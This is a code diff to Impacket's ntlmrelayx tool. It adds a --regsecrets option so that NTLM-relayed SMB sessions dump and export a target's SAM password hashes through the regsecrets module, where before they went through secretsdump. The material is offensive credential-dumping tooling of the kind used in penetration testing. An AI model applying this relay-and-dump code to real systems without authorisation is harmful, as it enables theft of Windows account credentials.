diff --git a/examples/ntlmrelayx.py b/examples/ntlmrelayx.py index 87b37a88b7..73390b89ad 100644 --- a/examples/ntlmrelayx.py +++ b/examples/ntlmrelayx.py @@ -185,6 +185,7 @@ def start_servers(options, threads): c.setTargets(targetSystem) c.setExeFile(options.e) c.setCommand(options.c) + c.setRegSecrets(options.regsecrets) c.setEnumLocalAdmins(options.enum_local_admins) c.setAddComputerSMB(options.add_computer) c.setDisableMulti(options.no_multirelay) @@ -358,6 +359,7 @@ def stop_servers(threads): 'If not specified, hashes will be dumped (secretsdump.py must be in the same directory)') smboptions.add_argument('--enum-local-admins', action='store_true', required=False, help='If relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary)') smboptions.add_argument('--rpc-attack', action='store', choices=[None, "TSCH", "ICPR"], required=False, default=None, help='Select the attack to perform over RPC over named pipes.') + smboptions.add_argument('--regsecrets', action='store_true', required=False, help='Do SAM dump with regsecrets instead of secretsdump.') #RPC arguments rpcoptions = parser.add_argument_group("RPC client options") @@ -451,6 +453,10 @@ def stop_servers(threads): if options.rpc_use_smb and not options.auth_smb: logging.error("Set -auth-smb to relay DCE/RPC to SMB pipes") sys.exit(1) + + if options.regsecrets and options.c: + logging.error("SAM dump with regsecrets is not compatible with executing a command") + sys.exit(1) # Ensuring the correct target is set when performing SCCM policies attack if options.sccm_policies is True and not options.target.rstrip('/').endswith("/ccm_system_windowsauth/request"): diff --git a/impacket/examples/ntlmrelayx/attacks/smbattack.py b/impacket/examples/ntlmrelayx/attacks/smbattack.py index d111c518e9..1b638a2533 100644 --- a/impacket/examples/ntlmrelayx/attacks/smbattack.py +++ b/impacket/examples/ntlmrelayx/attacks/smbattack.py @@ -157,7 +157,11 @@ def run(self): LOG.error(str(e)) else: - from impacket.examples.secretsdump import RemoteOperations, SAMHashes + if (self.config.regSecrets): + from impacket.examples.regsecrets import RemoteOperations, SAMHashes + else: + from impacket.examples.secretsdump import RemoteOperations, SAMHashes + from impacket.examples.ntlmrelayx.utils.enum import EnumLocalAdmins samHashes = None try: @@ -197,15 +201,20 @@ def run(self): else: bootKey = remoteOps.getBootKey() remoteOps._RemoteOperations__serviceDeleted = True - samFileName = remoteOps.saveSAM() - samHashes = SAMHashes(samFileName, bootKey, isRemote = True) + if (self.config.regSecrets): + LOG.debug("Dumping SAM with regsecrets") + samHashes = SAMHashes(bootKey, remoteOps = remoteOps) + else: + LOG.debug("Dumping SAM with secretsdump") + samFileName = remoteOps.saveSAM() + samHashes = SAMHashes(samFileName, bootKey, isRemote = True) samHashes.dump() samHashes.export(self.__SMBConnection.getRemoteHost()+'_samhashes') LOG.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost()) except Exception as e: LOG.error(str(e)) finally: - if samHashes is not None: + if (not self.config.regSecrets) and (samHashes is not None): samHashes.finish() if remoteOps is not None: remoteOps.finish() diff --git a/impacket/examples/ntlmrelayx/utils/config.py b/impacket/examples/ntlmrelayx/utils/config.py index c996fa5e69..b93a9eaae8 100644 --- a/impacket/examples/ntlmrelayx/utils/config.py +++ b/impacket/examples/ntlmrelayx/utils/config.py @@ -62,6 +62,7 @@ def __init__(self): self.enumLocalAdmins = False self.SMBServerChallenge = None self.rpc_attack = None + self.regSecrets = False # RPC options self.rpc_mode = None @@ -150,6 +151,9 @@ def setExeFile(self, filename): def setCommand(self, command): self.command = command + + def setRegSecrets(self, regSecrets): + self.regSecrets = regSecrets def setEnumLocalAdmins(self, enumLocalAdmins): self.enumLocalAdmins = enumLocalAdmins